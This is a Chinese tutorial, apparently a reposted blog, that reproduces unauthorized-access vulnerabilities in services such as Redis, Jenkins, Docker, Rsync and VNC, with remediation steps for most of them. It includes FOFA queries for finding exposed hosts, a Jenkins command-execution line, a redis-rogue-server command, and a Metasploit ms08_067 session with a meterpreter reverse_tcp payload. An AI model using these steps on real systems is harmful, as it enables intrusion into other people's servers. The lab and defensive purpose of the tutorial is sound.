redis,MongoDB等未授權訪問靶場復現

redis未授權訪問

在docker中啟動vulhub對應的靶場

目錄:cd /vulhub-master/redis/4-unacc

在kali上安裝redis程序進行服務連接

安裝redis
apt-get install redis
redis鏈接
redis-cli -h IP -p 端口

輸入info可以查看信息

接下來我們使用redis-rogue-server來獲取命令執行環境

https://github.com/n0b0dyCN/redis-rogue-server
python3 redis-rogue-server.py --rhost 目標IP --lhost 本機IP

MongoDB未授權訪問

在啟動MongoDB時沒有添加參數,導致可以使用默認空口令進行登錄

修復和防御:

1.在啟動時為MongoDB添加--auth參數,為MongoDB添加用戶

2.啟動時加入參數?--bind_ip 127.0.0.1?或在?/etc/mongodb.conf?文件中添加以下內容:
bind_ip = 127.0.0.1


Memcached未授權訪問

1.由于 Memcached 的安全設計缺陷,沒有權限控制模塊,所以對公網開放的 Memcache 服務很容易被攻擊者掃描發現,攻擊者無需認證,通過命令交互可直接讀取 Memcached 中的敏感信息。

2.復現

下載Memcached程序并執行命令啟動Memcached漏洞環境
使用Telnet程序探測目標端口
使用nmap腳本進行漏洞掃描

漏洞修復:
1. 設置Memcached只允許本地訪問。
2. 禁止外網訪問Memcached 11211端口。
3. 配置訪問控制策略。
4. 最小化權限運行。
5. 修改默認端口等。


Zookeeper未授權訪問

Zookeeper 安裝部署之后默認情況下不需要任何身份驗證,攻擊者可以遠程利用 Zookeeper,通過服務器收集敏感信息或者在 Zookeeper 內進行破壞。攻擊者能夠執行所有只允許由管理員運行的命令。

port="2181" && "Zookeeper" && country="US"

kali中使用命令進行漏洞測試

echo envi | nc ip 端?

使用Zookeeper可視化管理工具進行連接

修復方法

1.限制網絡訪問:通過防火墻或網絡策略,僅允許信任的 IP 地址(如集群內部節點)訪問 2181 端口,避免直接暴露在公網。
2.啟用身份認證:
在 Zookeeper 配置文件(zoo.cfg)中啟用 SASL 認證,通過jaas.conf配置用戶名密碼驗證;
結合 Kerberos 實現更嚴格的身份校驗(適用于分布式集群環境)。
3.權限控制:通過 Zookeeper 的 ACL(Access Control List)機制,為節點設置細粒度權限(如read、write、admin等),限制非授權用戶的操作范圍。
4.定期審計:啟用 Zookeeper 的審計日志,記錄所有操作行為,便于及時發現異常訪問。


Jenkins未授權訪問

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在搜索到的網站中,選擇系統管理,腳本命令行

?運行命令

println "whoami" .execute().text

漏洞修復

1.升級版本

2.添加認知,加強密碼強度

3.?禁止把Jenkins直接暴露在公網


Jupyter NoteBook未授權訪問

如果管理員未為Jupyter Notebook配置密碼,將導致未授權訪問漏洞,游客可在其中創建一個console并執行任意Python代碼和命令,默認端口:8888。

"Jupyter Notebook" && port="8888" && "terminals" //fofa
cd /vulhub/jupyter/notebook-rce
docker-compose up -d ?//vulhub靶場

如果存在未授權點擊連接會直接跳轉到web頁面不需要輸入密碼即可看到jupyter界面

點擊圖示的位置即可新建一個終端,可以執行命令

修復方法:

1.開啟身份驗證,防止未經授權的用戶進行訪問

2.訪問控制策略,限制IP訪問,只允許固定IP訪問


Elasticsearch未授權訪問

ElasticSearch是基于Lucene、由Java開發的流行企業級分布式全文搜索引擎,遵循Apache許可開源,提供RESTful web接口,其增刪改查操作均通過http接口完成。由于授權模塊需付費,免費開源的ElasticSearch可能存在未授權訪問漏洞,攻擊者通常會請求一個9200或者93000端口的服務器來獲得所有權限并對數據任意操作,進而導致業務系統面臨敏感數據泄露、數據丟失或破壞,甚至遭受勒索等風險。

"Elasticsearch" && port="9200"

?存在未授權可直接訪問到頁面,不需要登錄

漏洞測試

拼接/_nodes可以查看節點信息

修復方法:
1.限制IP訪問或者固定IP

2. config/elasticsearch.yml 中為9200端口設置認證等


Kibana未授權訪問

Kibana如果允許外網訪問且沒有做安全登錄認證,就會被外部任意訪問,查看所有數據,造成數據泄露。在默認配置下,Kibana就可以訪問Elasticsearch中的所有數據。

"kibana" && port="5601"

直接訪問Kibana的頁面且無需賬號密碼可以登陸進入登錄界面

修復方法:

1.升級到最新版

2.在 Kibana 所在的服務器上安裝 Nginx 服務,利用 Nginx 的轉發指令實現(訪問頁面時)需要輸入賬號密碼才可以訪問。

3.如果正常業務中 kibana 服務需要被其他服務器來訪問,可以通過 iptables 策略,僅允許指定的 IP 來訪問服務。


Docker Remote API未授權訪問

Docker Remote API配置不當可導致未授權訪問,被攻擊者惡意利用。攻擊者無需認證即可訪問到Docker數據,可能導致敏感信息泄露,黑客也可以刪除Docker上的數據,直接訪問宿主機上的敏感信息,或對敏感文件進行修改,最終完全控制服務器。

fofa語法

port="2375" && "docker"

直接訪問并拼接

/version 查看版本
/info 查看信息

使用 -H 參數連接目標主機的 Docker,使用 version命令查詢目標版本

漏洞修復:

1. 端口訪問控制 ?
對2375端口做網絡訪問控制,如設置iptables策略僅允許指定的IP來訪問Docker接口。 ?
2. 使用TLS認證


Kubernetes Api Server未授權訪問

Kubernetes正常啟動后開兩個默認端口(8080、6443),均提供Api Server服務,分別可通過Web訪問和kubectl調用。若運維未合理配置驗證與權限,攻擊者可借此獲取容器權限。

port="8080" && app="Kubernetes"

在打開的網頁中直接訪問 8080 端口會返回可用的 API 列表。

拼接version可以查看版本

3.修復方法:

1. 進行授權認證 ?
2. 使用Service Account令牌 ?
3. 配置防火墻策略


Hadoop未授權訪問

Hadoop是Apache開發的分布式系統基礎架構,若服務器開放其HDFS的50070等默認端口,黑客可通過命令行操作目錄數據(刪除、下載、瀏覽、執行命令等),危害極大。

port="8088" && app="Hadoop"

打開頁面可以直接訪問不經過用戶密碼驗證

?

漏洞修復:

1.如沒有必要可以關閉web管理頁面

2.開啟身份驗證,防止未經授權用戶登錄

3.設置“安全組”訪問控制策略,將 Hadoop 默認開放的多個端口對公網全部禁止或限制可信任的 IP 地址才能訪問包括 50070 以及 WebUI 等相關端口。


ActiveMQ未授權訪問

默認情況下,ActiveMQ服務是沒有配置安全參數。惡意人員可以利用默認配置弱點發動遠程命令執行攻擊,獲取服務器權限,從而導致數據泄露。

body="ActiveMQ" && port="8161"

訪問admin目錄,默認使用admin/admin即可登錄

漏洞修復:
1.可以修改其賬號密碼


RabbitMQ未授權訪問

port="15672"

直接訪問頁面輸入默認的賬號密碼即可,默認賬號密碼為guest

修復方法:

1.修改密碼為強密碼,刪掉默認的guest用戶

2.只允許內網訪問,不對外網訪問?


Springboot Actuator未授權訪問

在 Actuator 啟用的情況下,如果沒有做好相關權限控制,非法用戶可通過訪問默認的執行器端點(endpoints)來獲取應用系統中的監控信息,從而導致信息泄露甚至服務器被接管的事件發生。

原生斷點有:

/dump - 顯示線程轉儲(包括堆棧跟蹤)  
/autoconfig - 顯示自動配置報告  
/configprops - 顯示配置屬性  
/trace - 顯示最后幾條HTTP消息(可能包含會話標識符)  
/logfile - 輸出日志文件的內容  
/shutdown - 關閉應用程序  
/info - 顯示應用信息  
/metrics - 顯示當前應用的'指標'信息  
/health - 顯示應用程序的健康指標  
/beans - 顯示Spring Beans的完整列表  
/mappings - 顯示所有MVC控制器映射  
/env - 提供對配置環境的訪問  
/restart - 重新啟動應用程序
icon_hash="116323821"

2.?當 web 應用程序出現 4xx、5xx 錯誤時顯示類似以下頁面就能確定當前 web 應用是使用了 springboot 框架,可以拼接/env,/trace來查看基本的屬性,或者http跟蹤信息

3.修復方法

1.禁止/env拼接

2.禁止對外開放

3.升級?


FTP未授權訪問

如果服務器開啟了允許匿名訪問,則可以不需要登錄直接訪問到服務器上的相關內容

ftp://ip:port/


JBoss未授權訪問

title="Welcome to JBoss" && icon_hash="-656811182"

拼接?jmx-console/即可不需要登錄直接訪問

修復方法:

1. jboss.deployment部署shell
2. 進行JMX Console 安全配置。


Ldap未授權訪問

port="389"

通過Ldapadmin可視化工具做連接驗證

修復方法

1. 修改ldap的acl,不允許匿名訪問。
2. 根據業務設置ldap訪問白名單或黑名單


Rsync未授權訪問

由于配置不當,導致任何人可未授權訪問rsync,上傳本地文件,下載服務器文件。Rsync 默認允許匿名訪問,如果在配置文件中沒有相關的用戶認證以及文件授權,就會觸發隱患。

(port="873") && (is_honeypot=false && is_fraud=false)cd vulhub/rsync/common
docker-compose up -d

可使用Nmap掃描該端口是否開啟服務

可以訪問src目錄

rsync rsync://IP:873/src/

下載文件

利用定時任務反彈shell

?

等待17分鐘即可反彈到shell


VNC未授權訪問

(port="5900") && (is_honeypot=false && is_fraud=false)

使用MSF中的模塊進行檢測和漏洞利用

# VNC未授權檢測
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 172.16.1.1-254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
# VNC密碼爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 172.16.1.200
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密碼爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run
# 加載攻擊模塊
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.1.200
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 172.16.1.10
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
獲取會話后,直接run vnc可控制遠程虛擬機
# 直接控制遠程機器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.1.200
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit

3.vnc連接

vncviewer ipaddress?


Dubbo未授權訪問

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

使用Telnet直接連接進行測試

telnet IP port

?

防御手段

配置dubbo認證

設置防火墻策略


NSF共享目錄未授權

"nfs"

?執行命令進行漏洞復現

#安裝nfs客戶端
apt install nfs-common
#查看nfs服務器上的共享?錄
showmount -e 192.168.126.130
#掛載相應共享?錄到本地
mount -t nfs 192.168.126.130:/grdata /mnt
#卸載?錄
umount /mnt

漏洞修復

禁止外部訪問對應的端口

設置/etc/exports,對訪問進行控制?


Druid未授權訪問

title="Druid Stat Index"

直接訪問

漏洞修復

配置訪問賬號和密碼

禁止外網訪問?


CouchDB未授權訪問

(port="5984") && (is_honeypot=false && is_fraud=false)

curl連接

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/91180.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/91180.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/91180.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

設計模式:代理模式 Proxy

目錄問題解決方案結構代碼代理是一種結構型設計模式,讓你能夠提供對象的替代品或其占位符。代理控制著對于原對象的訪問,并允許在將請求提交給對象前后進行一些處理。 問題 為什么要控制對于某個對象的訪問呢? 舉個例子: 有這樣一…

Linux零基礎Shell教學全集(可用于日常查詢語句,目錄清晰,內容詳細)(自學尚硅谷B站shell課程后的萬字學習筆記,附課程鏈接)

此文章為學習了 尚硅谷B站課程 后的學習筆記 【尚硅谷】Shell腳本從入門到實戰_嗶哩嗶哩_bilibilihttps://www.bilibili.com/video/BV1hW41167NW/?spm_id_from333.337.search-card.all.click&vd_source68e0bbe20c8b1102b59ced40f67db628注意:需要先學Linux基礎…

GitLab 中的分支和標簽的定義及操作

(一)GitLab 中的分支和標簽的定義及操作 1. 分支(Branch) 定義: 分支是代碼倉庫中的獨立開發路徑,允許你在不影響主線(通常是 main 或 master 分支)的情況下,進行實驗、開…

第2章 cmd命令基礎:常用基礎命令(3)

Hi~ 我是李小咖,主要從事網絡安全技術開發和研究。 本文取自《李小咖網安技術庫》,歡迎一起交流學習🫡:https://imbyter.com 本節介紹的命令有顯示系統信息(systeminfo)、啟動指定程序(start&am…

RabbitMQ 發送方確認的兩大工具 (With Spring Boot)

核心概念解析 發布者確認機制的核心思想是:將消息投遞的可靠性從“盡力而為”提升為“契約保證”。生產者不再是“發后不理”,而是與 Broker 建立一個雙向的溝通渠道。 在 Spring AMQP 的封裝下,這個機制主要由兩個回調接口實現: …

KONG API Gateway中的核心概念

在使用Kong API Gateway(API網關)時,理解其核心概念是掌握其工作原理的基礎。這些概念既體現了Kong的設計哲學,也決定了它如何適配復雜的API管理場景(如微服務、多團隊協作等)。本文將系統梳理Kong的核心概…

如何解決pip安裝報錯ModuleNotFoundError: No module named ‘jupyterlab’問題

【Python系列Bug修復PyCharm控制臺pip install報錯】如何解決pip安裝報錯ModuleNotFoundError: No module named ‘jupyterlab’問題 摘要 在開發過程中,我們經常會遇到各種模塊安裝的問題,尤其是在使用PyCharm時,經常會遇到pip install時的…

3 運算符與表達式

運算符:對字面量或者變量進行操作的符號 表達式:用運算符把字面量或者變量連接起來符合java語法的式子就可以稱作表達式不同運算符連接的表達式體現的是不同類型的表達式int a 10; int b 20; int c a b;:運算符,并且是算術運算…

MySQL的單行函數:

目錄 函數的理解: MySQL的內置函數及分類: 單行函數: 數值函數: 基本函數: 角度與弧度互換函數: 三角函數: 指數與對數: 進制轉換: 字符串函數: 日…

設計模式(二十一)行為型:狀態模式詳解

設計模式(二十一)行為型:狀態模式詳解狀態模式(State Pattern)是 GoF 23 種設計模式中的行為型模式之一,其核心價值在于允許一個對象在其內部狀態改變時改變其行為,使得對象看起來像是修改了它的…

深入理解 Doris Compaction:提升查詢性能的幕后功臣

在 Doris 的數據存儲與查詢體系里,Compaction 是保障查詢效率、優化存儲結構的關鍵機制。如果你好奇 Doris 如何在高頻寫入后仍能高效響應查詢,或是想解決數據版本膨脹帶來的性能問題,這篇關于 Compaction 的深度解析值得收藏 👇 …

css 實現虛線效果的多種方式

使用邊框實現虛線 通過設置元素的邊框樣式來實現虛線效果。以下為示例代碼: .dashed {border: 1px dashed black; }使用 CSS 偽元素實現虛線 使用偽元素來模擬虛線的效果。以下為示例代碼: .dashed::before {content: "";display: block;height: 1px;border-bo…

深入剖析 RocketMQ 分布式事務:原理、流程與實踐

Apache RocketMQ 是一種分布式消息隊列系統,支持分布式事務消息,以確保在分布式系統中數據的一致性。它通過一種基于兩階段提交(2PC)的機制結合補償邏輯來實現分布式事務的最終一致性。以下是對 RocketMQ 分布式事務的詳細講解,包括其核心概念…

具身智能 自動駕駛相關崗位的技術棧與能力地圖

一、硬技能技術棧(優先級排序) 1. 核心領域技術(★★★★★)技術方向具體技能學習建議大模型實戰- VLA架構(RT-2、PaLM-E)開發/微調- 多模態對齊(CLIP、Flamingo)- 生成式策略&#…

實現了加載 正向 碰撞 雅可比 仿真

""" # 此示例從 URDF 文件中加載一個 UR10 機械臂的模型 # 隨后演示 Pinocchio 庫的基本功能,如正向運動學計算 # 雅可比矩陣計算、碰撞檢測以及動力學仿真 """ # 導入 meshcat 的幾何模塊,用于創建和管理可視化的幾何對象 import meshcat.geo…

【0基礎PS】PS工具詳解--畫筆工具

目錄前言一、畫筆工具的位置與快捷鍵?二、畫筆工具選項欄設置?三、畫筆工具的進階應用?四、常見問題及解決方法?總結前言 在 Photoshop 的眾多工具中,畫筆工具無疑是極具創造力和實用性的工具之一。無論是進行圖像繪制、照片修飾,還是特效制作&…

window10和ubuntu22.04雙系統之卸載ubuntu系統

window10和ubuntu22.04雙系統之卸載ubuntu系統)1. 刪除Ubuntu系統占用的磁盤分區(在Windows下操作)2. 刪除ubuntu開機引導項1. winr出來終端提示框后輸入2. 然后會在命令行中顯示電腦的硬盤列表,輸入命令選擇安裝Windows的那個硬盤…

(C++)C++類和類的方法(基礎教程)(與Python類的區別)

前言&#xff1a; 本篇博客建議搭配&#xff1a;&#xff08;Python&#xff09;類和類的方法&#xff08;基礎教程介紹&#xff09;&#xff08;Python基礎教程&#xff09;-CSDN博客 一起學習使用&#xff1b; 源代碼&#xff1a; #include <iostream> #include &…

【NLP輿情分析】基于python微博輿情分析可視化系統(flask+pandas+echarts) 視頻教程 - 微博文章數據可視化分析-文章分類下拉框實現

大家好&#xff0c;我是java1234_小鋒老師&#xff0c;最近寫了一套【NLP輿情分析】基于python微博輿情分析可視化系統(flaskpandasecharts)視頻教程&#xff0c;持續更新中&#xff0c;計劃月底更新完&#xff0c;感謝支持。今天講解微博文章數據可視化分析-文章分類下拉框實現…

Git命令保姆級教程

Git 入門網站 https://learngitbranching.js.org/?localezh_CN Git 命令 git init // 在本地目錄內部會生成.git文件夾 git initgit clone // 從git服務器拉取代碼 // 代碼下載完成后在當前文件夾中會有一個 shop 的目錄&#xff0c;通過 cd shop 命令進入目錄。 git clone ht…